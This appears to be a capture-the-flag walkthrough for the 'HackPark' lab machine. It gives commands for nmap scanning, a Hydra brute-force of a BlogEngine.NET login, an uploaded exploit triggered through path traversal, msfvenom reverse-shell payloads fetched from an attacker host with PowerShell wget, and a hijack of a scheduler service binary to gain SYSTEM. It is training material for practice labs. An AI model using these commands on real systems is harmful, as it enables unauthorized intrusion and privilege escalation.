HackPark

Tasks:

  1. Deploy the vulnerable Windows machine:
    1. Deploy the machine do usual nmap scan with nmap --script=vuln -T5 -sV ip ,port 80,3389 open. Visit ip in browser , do reverse image search of image displayed and submit answer.
  2. Using Hydra to brute-force a login:
    1. Go to login page , enter dummy username and password and send request to repeater in burp.
    2. Attack login page using hydra hydra -l admin -P /usr/share/wordlists/rockyou.txt ip http-post-form "PATH_TO_LOGIN:POSTDATA REPLACE USERNAME/PASSWORD WITH ^USER^/^PASS^:STRING IN FAILED LOGIN PAGE" - 1qaz2wsx
  3. Compromise the machine:
    1. Login using password cracked above, there is about page in admin which displays BlogEngine.NET v3.3.6.0 is used, Use searchsploit for exploits.
    2. searchsploit blogengine 3.3.6 remote - Get RCE vulnerability id and run searchsploit -x 46353 to get CVE details. Copy the exploit code to root directory cp "/root/Desktop/Additional Tools/searchsploit/exploits/aspx/webapps/46353.cs" . and change attacker ip and port in the script.
    3. Go to create new post, open file manager icon and upload the script after renaming it to PostView.aspx as per the information and publish the post.
    4. Start netcat listener in attacker machine port 4445 and open http://ip/?theme=../../App\_Data/files in browser to get shell in netcat session.
  4. Windows Privilege Escalation:
    1. Start metasploit listener using msfconsole use /exploit/multi/handler, set PAYLOAD windows/meterpreter/reverse_tcp, set LHOST ATTACKERIP, set LPORT ATTACKERPORT & run
    2. Generate payload for windows using msfvenom - msfvenom -p windows/meterpreter/reverse_tcp LHOST=ATTACKERIP LPORT=4446 -e x86/shikata_ga_nai -f exe -o shell.exe and start python http server in attacker machine , upload the shell using powershell -c wget "http://ATTACKERIP:8080/shell.exe" -outfile "shell.exe" in victim machine and run shell.exe in victim machine to get meterpreter session.
    3. upload winpeas.exe using meterpreter shell , shell to get cmd, winpeas.exe servicesinfo to know if we could exploit any services - WindowsScheduler, File Permissions: Everyone [WriteData/CreateFiles], WService.exe is service binary we need to exploit but it gives error when submitted , Go to event logs(hint) cd "C:\Program Files (x86)\SystemScheduler\Events" and type 20198415519.INI_LOG.txt - Message.exe is the answer.
    4. Generate another malicious exe with name Message.exe and start another meterpreter listener at 4447. upload Message.exe to C:\Program Files (x86)\SystemScheduler - You will get system shell when Message.exe is run by WindowsScheduler service next time.
    5. Run shell , type C:\Users\jeff\Desktop\user.txt, type C:\Users\Administrator\Desktop\root.txt to get cmd, user and root flag & submit !!!
  5. Privilege Escalation Without Metasploit:
    1. Instead of meterpreter listener we can use netcat as listener and set payload in msfvenom to windows/shell_reverse_tcp.
    2. You can host winpeas.exe using python and download into victim machine or download binary/bat from internet directly using powershell and wget and execute winpeas .

results matching ""

    No results matching ""